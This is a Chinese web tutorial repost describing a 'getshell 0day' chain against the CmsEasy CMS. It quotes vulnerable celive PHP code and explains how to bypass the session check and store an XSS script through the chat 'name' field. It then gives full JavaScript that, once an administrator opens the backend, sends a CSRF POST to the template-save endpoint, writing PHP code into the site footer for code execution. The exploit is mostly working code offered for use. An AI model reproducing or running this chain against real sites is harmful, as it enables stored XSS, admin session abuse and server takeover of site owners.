网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

cmseasy getshell 0day - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 10:16 作者: 阅读:

[导读] 代码如下:celive index php 代码:$_SESSION[ 39;thislive 39;] = md5(time()); $_SESSION[ 39;thislivetmp 39;] = $_SESSION[ 39;thislive 39;]; if ($config[ 39;customer_info 39;]) {...

 代码如下:
celive/index.php 代码:
  
$_SESSION['thislive'] = md5(time()); 
$_SESSION['thislivetmp'] = $_SESSION['thislive']; 
  
if ($config['customer_info']) { 
header('Location: '.$config['url'].'/live/?action=0&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid'])); 
} else { 
header('Location: '.$config['url'].'/live/?action=1&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid'])); 
}

 

 
通过 302 header 到\celive\live\index.php这个地址,而且 $thislive='.$_SESSION['thislive'] 每次访问的值都会不一样.
\celive\live\index.php 代码:
 


if(isset($_GET['departmentid'])){ 
$departmentid=addslashes($_GET['departmentid']); 
}else{ 
$sql = "SELECT `departmentid` FROM `".$config['prefix']."assigns` WHERE 1"; 
@$result = $GLOBALS['db']->my_fetch_array($sql); 
$tatolr=count($result)-1; 
$randomr=rand(0,$tatolr); 
$departmentid = $result[$randomr]['departmentid']; 
} 
$timestamp=time(); 
$name=addslashes($_POST['name']); 
$email=addslashes($_POST['email']); 
$phone=addslashes($_POST['phone']); 
$name=(!empty($name)) ? $name : 'Guest'; 
$email=(!empty($email)) ? $email : '-'; 
$phone=(!empty($phone)) ? $phone : '0'; 
$ip=$_SERVER["REMOTE_ADDR"]; 
$ip=iconv('gb2312',$GLOBALS['lang']['charset'],$ip); 
if(empty($departmentid)) $departmentid=0; 
if($_SESSION['thislivetmp']==$_GET['thislive']){ 
$db->query("INSERT INTO `sessions` (`id` ,`name` ,`email` ,`phone` ,`departmentid` ,`timestamp` ,`ip` ,`status` ) VALUES (NULL , '".$name."', '".$email."', '".$phone."', '".$departmentid."', '".$timestamp."', '".$ip."', '0');"); 
$sessionid = mysql_insert_id(); 
$_SESSION['departmentid'] = $departmentid; 
$_SESSION['sessionid'] = $sessionid; 
$_SESSION['timestamp'] = $timestamp; 
$_SESSION['name'] = $name; 
}

 

 
$name=addslashes($_POST['name']);这里可以xss 但是他是302 head过来的 。
if($_SESSION['thislivetmp']==$_GET['thislive']) 要绕过这个判断, \celive\live\index.php 只能访问一次,以保证header过去的GET变量
和session[thislivetmp] 一样 :) and =) produces
java 编程 得到302地址和cookie 构造 post name 为js地址 再 post 到302地址上 ,管理员在查看后台时 ,js触发通过ajax 请求 编辑后台模块插入一句话
 
csrf插入到模版中的php代码
 
 


 
js代码:
 
  
function sendrequest(){ 
 var m=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"] 
 if (window.ActiveXObject){ 
  for (var i=0; i<m.length; i++){ 
   try{ 
    return new ActiveXObject(m[i]) 
   } 
   catch(e){} 
  } 
 }else if (window.XMLHttpRequest) { 
 return new XMLHttpRequest() 
 }else{ 
    return false 
 } 
  
} 
var request=new sendrequest(); 
var data= "sid=footer_html&slen=2661&scontent=%3C!--+%E9%A1%B5%E5%BA%95+--%3E%0A%3Cdiv+id%3D%22footer%22+class%3D%22mt10%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cdiv+class%3D%22footer%22%3E%0A%3C!--+%E5%8F%8B%E6%83%85logo+--%3E%0A%3Cdiv+class%3D%22links%22%3E%0A%7Bif+%24topid%3D%3D0%7D%0A%7Bloop+friendlink('image'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+title%3D%22%7B%24flink%5Bname%5D%7D%22%3E%3Cimg+src%3D%22%7B%24flink%5Blogo%5D%7D%22+%2F%3E%3C%2Fa%3E%0A%7B%2Floop%7D%0A%7Belse%7D%0A%7Blang(hotkeys)%7D%EF%BC%9A+%7Bgethotsearch(10)%7D%0A%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C!--+%E9%A1%B5%E5%BA%95%E5%AF%BC%E8%88%AA+--%3E%0A%3Cdiv+class%3D%22about%22%3E%0A%3Cimg+src%3D%22%7B%24skin_path%7D%2Fimages%2Ffoot_logo.gif%22+%2F%3E%0A%7Btag_%E7%BD%91%E7%AB%99%E9%A1%B5%E5%BA%95%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC%E7%AD%89%E8%AF%B4%E6%98%8E%7D%0A%7Bif+get('opguestadd')%3D%3D'1'%7D%3Ca+rel%3D%22nofollow%22+href%3D%22%7B%24base_url%7D%2F%3Fg%3D1%22%3E%7Blang(opguestadd)%7D%3C%2Fa%3E+%7C%7B%2Fif%7D%0A%3Ca+href%3D%22%23%22%3ETOP%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv+class%3D%22copyright%22%3E%0A%0A%3C!--+%E9%A1%B5%E5%BA%95%E8%AF%B4%E6%98%8E+--%3E%0A%7Bget(site_right)%7D+%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2F%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.%C2%A0%C2%A0+%7Bif+get('site_login')%3D%3D'1'%7D%7Blogin_js()%7D%7B%2Fif%7D%0A%3Cdiv+class%3D%22blank5%22%3E%3C%2Fdiv%3E%0A%7Bgetcnzzcount()%7D%C2%A0%C2%A0Powered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%C2%A0%C2%A0%3Ca+rel%3D%22nofollow%22+href%3D%22http%3A%2F%2Fwww.miibeian.gov.cn%2F%22+rel%3D%22nofollow%22+target%3D%22_blank%22%3E%7Bget('site_icp')%7D%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22clear%22%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%7Bif+%24topid%3D%3D0%7D%3C!--+%E7%83%AD%E9%97%A8%E5%85%B3%E9%94%AE%E8%AF%8D+--%3E%0A%3Cdiv+class%3D%22hot_keys%22%3E%0A%3Cstrong%3E%7Blang(hotkeys)%7D%EF%BC%9A%3C%2Fstrong%3E+%7Bgethotsearch(10)%7D%0A%3Cdiv+class%3D%22blank10%22%3E%3C%2Fdiv%3E%0A%3C!--+%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5+--%3E%0A%0A%3Cstrong%3E%7Blang('links')%7D%EF%BC%9A%3C%2Fstrong%3E%0A%7Bloop+friendlink('text'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7B%24flink%5Bname%5D%7D%3C%2Fa%3E%0A%7B%2Floop%7D%0A%0A%3C%2Fdiv%3E%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%7B%24base_url%7D%2Fjs%2Fcommon.js%22%3E%3C%2Fscript%3E%0A%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E+%0A%2F%2F+%E5%85%AC%E5%91%8A%E6%BB%9A%E5%8A%A8js%0Avar+t%3DsetInterval(myfunc%2C1000)%3B+%0Avar+oBox%3Ddocument.getElementById(%22announ%22)%3B+%0Afunction+myfunc()%7B+%0Avar+o%3DoBox.firstChild+%0AoBox.removeChild(o)+%0AoBox.appendChild(o)+%0A%7D+%0AoBox.onmouseover%3Dfunction()%0A%7B%0AclearInterval(t)%0A%7D+%0AoBox.onmouseout%3Dfunction()%0A%7B%0At%3DsetInterval(myfunc%2C2000)%2F%2F%E6%BB%9A%E5%8A%A8%E6%97%B6%E9%97%B4%EF%BC%8C%E9%BB%98%E8%AE%A42%E7%A7%92%0A%7D+%0A%3C%2Fscript%3E%0A%0A%3C!--+%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D+--%3E%0A%7Btemplate+'system%2Fservers.html'%7D%0A%3C!--+%E7%9F%AD%E4%BF%A1+--%3E%0A%7Btemplate+'system%2Fsms.html'%7D%0A%0A%0A%7Bif+get('share')%3D%3D'1'%7D%0A%3C!--+Baidu+Button+BEGIN+--%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshare_js%22+data%3D%22type%3Dslide%26img%3D6%26pos%3Dright%26uid%3D620555%22+%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshell_js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0A%09%09var+bds_config+%3D+%7B%22bdTop%22%3A150%7D%3B%0A%09%09document.getElementById(%22bdshell_js%22).src+%3D+%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Fshell_v2.js%3Ft%3D%22+%2B+new+Date().getHours()%3B%0A%3C%2Fscript%3E%0A%3C!--+Baidu+Button+END+--%3E%0A%7B%2Fif%7D%0A%0A%0A%3Cscript%3E%0Afunction+checkmail(str)%0A%7B%0Avar+strreg%3D%22email%22%3B%0Avar+r%3B%0Avar+strtext%3Ddocument.all(str).value%3B%0A%2F%2Fstrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%5Ba-za-z0-9%5D%2B((.%7C-)%5Ba-za-z0-9%5D%2B)*.%5Ba-za-z0-9%5D%2B%24%2Fi%3B%0Astrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%7B1%7Dw%2B.%7B1%7Dw%7B2%2C4%7D(.%7B0%2C1%7Dw%7B2%7D)%7B0%2C1%7D%2Fig%3B%0Ar%3Dstrtext.search(strreg)%3B%0Aif(r%3D%3D-1)+%7B%0Aalert(%22%E9%82%AE%E7%AE%B1%E6%A0%BC%E5%BC%8F%E9%94%99%E8%AF%AF!%22)%3B%0Adocument.all(str).focus()%3B%0A%7D%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp+phpinfo()%3B%3F%3E%EF%BC%9B"; 
request.open("POST", "/cmseasy/index.php?case=template&act=save&admin_dir=admin&site=default", true); 
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8"); 
request.send(data)

 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论